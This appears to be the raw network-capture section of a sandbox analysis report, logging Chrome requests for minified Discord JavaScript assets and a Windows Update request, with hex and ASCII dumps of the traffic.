                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 3a 22 73 74 72 65 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 5f 5f 32 63 37 66 63 22 2c 73 74 72 65 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 42 74 6e 3a 22 73 74 72 65 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 42 74 6e 5f 5f 35 31 63 32 66 22 2c 73 74 72 65 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 49 6d 61 67 65 3a 22 73 74 72 65 61 6d 65 72 4d 6f 64 65 45 6e 61 62 6c 65 64 49 6d 61 67 65 5f 61 30 64 39 34 66 22 2c 76 65 72 74 69 63 61 6c 3a 22 76 65 72 74 69 63 61 6c 5f 5f 31 38 64 32 35 22 2c 77 72 61 70 3a 22 77 72 61 70 5f 5f 33 66 35 35 37 22 2c 77 72 61 70 52 65 76 65 72 73 65 3a 22 77 72 61 70 52 65 76 65 72 73 65 5f 5f 36 65 33 63 66 22 7d 7d 2c 31 32 36 38 35 37 3a 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: amerModeEnabled:"streamerModeEnabled__2c7fc",streamerModeEnabledBtn:"streamerModeEnabledBtn__51c2f",streamerModeEnabledImage:"streamerModeEnabledImage_a0d94f",vertical:"vertical__18d25",wrap:"wrap__3f557",wrapReverse:"wrapReverse__6e3cf"}},126857:function
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6e 65 72 49 74 65 6d 3a 22 73 70 69 6e 6e 65 72 49 74 65 6d 5f 5f 32 33 61 36 31 22 2c 76 65 72 69 66 79 43 6f 6e 6e 65 63 74 65 64 41 63 63 6f 75 6e 74 3a 22 76 65 72 69 66 79 43 6f 6e 6e 65 63 74 65 64 41 63 63 6f 75 6e 74 5f 64 34 32 34 31 38 22 7d 7d 2c 39 39 31 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 77 72 61 70 70 65 72 3a 22 77 72 61 70 70 65 72 5f 5f 32 64 39 62 31 22 7d 7d 2c 37 31 30 34 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 7b 61 72 74 77 6f 72 6b 3a 22 61 72 74 77 6f 72 6b 5f 5f 38 66 63 39 32 22 2c 63 68 61 72 61 63 74 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 22 63 68 61 72
                                                                          Data Ascii: nerItem:"spinnerItem__23a61",verifyConnectedAccount:"verifyConnectedAccount_d42418"}},99130:function(e,t,o){"use strict";e.exports={wrapper:"wrapper__2d9b1"}},71041:function(e,t,o){"use strict";e.exports={artwork:"artwork__8fc92",characterBackground:"char


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          228192.168.2.549963162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:08 UTC865OUTGET /assets/3726.e3e95df69f8cf8ff7aa8.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:08 UTC970INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 37 36 36 31 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 32 30 62 63 66 35 63 37 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:08 GMTContent-Type: application/javascriptContent-Length: 476610Connection: closeCF-Ray: 8336f4e20bcf5c75-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:08 UTC399INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 37 32 36 22 5d 2c 7b 33 33 31 35 34 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 28 22 38 35 34 35 30 38 22 29 2c 72 28 22 37 30 31 30 32 22 29 3b 76 61 72 20 69 3d 72 28 22 34 36 34 35 31 30 22 29 2c 6e 3d 72 28 22 37 36 35 33 37 39 22 29 2c 6f 3d 72 28 22 36 36 37 37 36 39 22 29 2c 61 3d 72 28 22 36 34 30 31 30 37 22 29 2c 73 3d 72 28 22 35 35 34 37 34 31 22 29 2c 66 3d 72 28 22 39 30 33 33 38 39 22 29 2c 63 3d 72 28 22 38 36 32 34 34 30 22 29 2c 68 3d 72 28 22 33 33 38 31 30 30 22 29 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3726"],{331543:function(t,e,r){"use strict";r("854508"),r("70102");var i=r("464510"),n=r("765379"),o=r("667769"),a=r("640107"),s=r("554741"),f=r("903389"),c=r("862440"),h=r("338100"),
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 69 73 29 2c 64 3d 63 28 28 62 26 26 6c 28 72 29 3f 6d 28 72 2c 22 22 29 3a 72 29 2e 6c 65 6e 67 74 68 29 3b 69 66 28 21 66 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 70 20 63 61 6c 6c 62 61 63 6b 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 28 65 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 29 3b 66 6f 72 28 76 61 72 20 70 3d 69 28 72 2c 64 29 2c 67 3d 30 3b 67 3c 64 3b 29 7b 76 61 72 20 79 3d 75 28 67 29 3b 69 66 28 73 28 72 2c 79 29 29 7b 76 61 72 20 76 3d 6e 28 74 2c 65 2c 5b 61 28 72 2c 79 29 2c 67 2c 72 5d 29 3b 6f 28 70 2c 79 2c 76 29 7d 67 2b 3d 31 7d 72 65 74 75 72 6e 20 70 7d 7d 2c 37 33 38 38 33 38
                                                                          Data Ascii: is),d=c((b&&l(r)?m(r,""):r).length);if(!f(t))throw TypeError("Array.prototype.map callback must be a function");arguments.length>1&&(e=arguments[1]);for(var p=i(r,d),g=0;g<d;){var y=u(g);if(s(r,y)){var v=n(t,e,[a(r,y),g,r]);o(p,y,v)}g+=1}return p}},738838
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 28 74 68 69 73 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 44 65 63 6f 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 7c 7c 22 64 65 72 22 2c 21 74 68 69 73 2e 64 65 63 6f 64 65 72 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 29 26 26 28 74 68 69 73 2e 64 65 63 6f 64 65 72 73 5b 74 5d 3d 74 68 69 73 2e 5f 63 72 65 61 74 65 4e 61 6d 65 64 28 6e 5b 74 5d 29 29 2c 74 68 69 73 2e 64 65 63 6f 64 65 72 73 5b 74 5d 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 67 65 74 44 65 63 6f 64 65 72 28 65 29 2e 64 65 63 6f 64 65 28 74 2c 72 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 45 6e 63 6f 64 65 72
                                                                          Data Ascii: (this)},a.prototype._getDecoder=function(t){return t=t||"der",!this.decoders.hasOwnProperty(t)&&(this.decoders[t]=this._createNamed(n[t])),this.decoders[t]},a.prototype.decode=function(t,e,r){return this._getDecoder(e).decode(t,r)},a.prototype._getEncoder
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 79 70 65 6f 66 20 74 2e 73 61 76 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 65 73 74 6f 72 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 69 73 45 6d 70 74 79 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 65 61 64 55 49 6e 74 38 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 73 6b 69 70 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 77 3b 72 65 74 75 72 6e 20 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 73 61 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 6f 66 66 73 65 74 3a 74 68 69 73 2e 6f 66 66 73 65 74 2c 72 65 70 6f 72 74 65 72 3a 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 73 61 76 65 2e 63 61 6c 6c 28 74 68
                                                                          Data Ascii: ypeof t.save&&"function"==typeof t.restore&&"function"==typeof t.isEmpty&&"function"==typeof t.readUInt8&&"function"==typeof t.skip&&"function"==typeof t.raw;return e},a.prototype.save=function(){return{offset:this.offset,reporter:n.prototype.save.call(th
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 73 2e 76 61 6c 75 65 3f 74 5b 65 5d 3d 74 68 69 73 2e 76 61 6c 75 65 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 76 61 6c 75 65 3f 74 2e 77 72 69 74 65 28 74 68 69 73 2e 76 61 6c 75 65 2c 65 29 3a 6f 2e 69 73 42 75 66 66 65 72 28 74 68 69 73 2e 76 61 6c 75 65 29 26 26 74 68 69 73 2e 76 61 6c 75 65 2e 63 6f 70 79 28 74 2c 65 29 2c 65 2b 3d 74 68 69 73 2e 6c 65 6e 67 74 68 29 2c 74 29 7d 7d 2c 32 32 32 34 33 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 52 65 70 6f 72 74 65 72 3d 72 28 22 35 37 31 34 30 35 22 29 2e 52 65 70 6f 72 74 65 72 2c 65 2e 44 65 63 6f 64 65 72 42 75 66 66 65 72 3d 72 28 22 31 33 30 32 30 22 29 2e 44 65 63 6f 64 65 72 42 75 66 66 65 72 2c 65 2e 45 6e 63 6f
                                                                          Data Ascii: s.value?t[e]=this.value:"string"==typeof this.value?t.write(this.value,e):o.isBuffer(this.value)&&this.value.copy(t,e),e+=this.length),t)}},222438:function(t,e,r){"use strict";e.Reporter=r("571405").Reporter,e.DecoderBuffer=r("13020").DecoderBuffer,e.Enco
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 65 5b 72 5d 3d 74 5b 72 5d 7d 29 3b 6c 65 74 20 72 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 70 61 72 65 6e 74 29 3b 72 65 74 75 72 6e 20 72 2e 5f 62 61 73 65 53 74 61 74 65 3d 65 2c 72 7d 2c 4e 6f 64 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3b 66 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 72 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 63 68 69 6c 64 72 65 6e 2e 70 75 73 68 28 72 29 2c 72 5b 65 5d 2e 61 70 70 6c 79 28 72 2c 61
                                                                          Data Ascii: (function(r){e[r]=t[r]});let r=new this.constructor(e.parent);return r._baseState=e,r},Node.prototype._wrap=function(){let t=this._baseState;f.forEach(function(e){this[e]=function(){let r=new this.constructor(this);return t.children.push(r),r[e].apply(r,a
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 6e 63 6f 64 69 6e 67 3a 20 22 2b 65 2e 65 6e 63 29 7d 7d 29 2c 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4e 6f 64 65 2e 70 72 6f 74 6f 74 79 70 65 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 2c 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 28 6e 75 6c 6c 3d 3d 3d 65 2e 74 61 67 29 2c 65 2e 74 61 67 3d 74 2c 74 68 69 73 2e 5f 75 73 65 41 72 67 73 28 72 29 2c 74 68 69 73 7d 7d 29 2c 4e 6f 64 65 2e 70 72 6f 74 6f 74 79 70 65 2e 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 61 28 74 29 3b 6c 65 74 20 65 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3b 72 65 74 75 72 6e 20
                                                                          Data Ascii: ncoding: "+e.enc)}}),s.forEach(function(t){Node.prototype[t]=function(){let e=this._baseState,r=Array.prototype.slice.call(arguments);return a(null===e.tag),e.tag=t,this._useArgs(r),this}}),Node.prototype.use=function(t){a(t);let e=this._baseState;return
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 3d 3d 3d 69 2e 70 61 72 65 6e 74 29 72 65 74 75 72 6e 20 74 2e 77 72 61 70 52 65 73 75 6c 74 28 69 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 5f 64 65 63 6f 64 65 28 74 2c 65 29 29 3b 6c 65 74 20 6e 3d 69 2e 64 65 66 61 75 6c 74 2c 61 3d 21 30 2c 73 3d 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 3d 69 2e 6b 65 79 26 26 28 73 3d 74 2e 65 6e 74 65 72 4b 65 79 28 69 2e 6b 65 79 29 29 2c 69 2e 6f 70 74 69 6f 6e 61 6c 29 7b 6c 65 74 20 72 3d 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 3d 69 2e 65 78 70 6c 69 63 69 74 3f 72 3d 69 2e 65 78 70 6c 69 63 69 74 3a 6e 75 6c 6c 21 3d 3d 69 2e 69 6d 70 6c 69 63 69 74 3f 72 3d 69 2e 69 6d 70 6c 69 63 69 74 3a 6e 75 6c 6c 21 3d 3d 69 2e 74 61 67 26 26 28 72 3d 69 2e 74 61 67 29 2c 6e 75 6c 6c 21 3d 3d 72 7c 7c 69 2e 61 6e 79 29
                                                                          Data Ascii: ===i.parent)return t.wrapResult(i.children[0]._decode(t,e));let n=i.default,a=!0,s=null;if(null!==i.key&&(s=t.enterKey(i.key)),i.optional){let r=null;if(null!==i.explicit?r=i.explicit:null!==i.implicit?r=i.implicit:null!==i.tag&&(r=i.tag),null!==r||i.any)
                                                                          2023-12-10 16:45:08 UTC1369INData Raw: 74 2c 65 2c 72 29 7b 6c 65 74 20 69 3d 74 68 69 73 2e 5f 62 61 73 65 53 74 61 74 65 3b 69 66 28 22 73 65 71 22 3d 3d 3d 74 7c 7c 22 73 65 74 22 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 22 73 65 71 6f 66 22 3d 3d 3d 74 7c 7c 22 73 65 74 6f 66 22 3d 3d 3d 74 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 64 65 63 6f 64 65 4c 69 73 74 28 65 2c 74 2c 69 2e 61 72 67 73 5b 30 5d 2c 72 29 3b 69 66 28 2f 73 74 72 24 2f 2e 74 65 73 74 28 74 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 64 65 63 6f 64 65 53 74 72 28 65 2c 74 2c 72 29 3b 69 66 28 22 6f 62 6a 69 64 22 3d 3d 3d 74 26 26 69 2e 61 72 67 73 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 64 65 63 6f 64 65 4f 62 6a 69 64 28 65 2c 69 2e 61 72 67 73 5b 30 5d 2c 69 2e 61 72 67 73 5b 31 5d 2c 72 29 3b
                                                                          Data Ascii: t,e,r){let i=this._baseState;if("seq"===t||"set"===t)return null;if("seqof"===t||"setof"===t)return this._decodeList(e,t,i.args[0],r);if(/str$/.test(t))return this._decodeStr(e,t,r);if("objid"===t&&i.args)return this._decodeObjid(e,i.args[0],i.args[1],r);


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          229192.168.2.54996252.165.165.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FNTl6mFZVU2Yvoy&MD=3dvdtXe6 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2023-12-10 16:45:09 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 4d 78 31 52 6f 4a 48 2f 71 45 77 70 57 66 4b 6c 6c 78 37 73 62 73 6c 32 38 41 75 45 52 7a 35 49 59 64 63 73 76 74 54 4a 63 67 4d 3d 5f 32 31 36 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 62 66 39 35 61 63 63 32 2d 38 61 32 32 2d 34 34 35 32 2d
                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"MS-CorrelationId: bf95acc2-8a22-4452-
                                                                          2023-12-10 16:45:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                          2023-12-10 16:45:09 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          230192.168.2.549965162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:09 UTC866OUTGET /assets/51301.032f682bd3663cc3e88c.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dPS26sSQJQbE3uPVddYoKuGobua4yJj6RAT9CXWe_4s-1702226708068-0-604800000
                                                                          2023-12-10 16:45:09 UTC970INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 38 34 31 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 34 63 65 34 32 64 61 38 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:09 GMTContent-Type: application/javascriptContent-Length: 308414Connection: closeCF-Ray: 8336f4e4ce42da83-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:09 UTC399INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 31 33 30 31 22 5d 2c 7b 38 39 35 35 34 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 73 2c 63 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 2e 72 28 73 29 2c 63 2e 64 28 73 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 7d 29 2c 63 28 22 37 38 31 37 33 38 22 29 2c 63 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51301"],{895547:function(t,s,c){"use strict";c.r(s),c.d(s,{default:function(){return e}}),c("781738"),c("424973");var e=function(){var t={base:"https://cdn.jsdelivr.net/gh/jdecked/twe
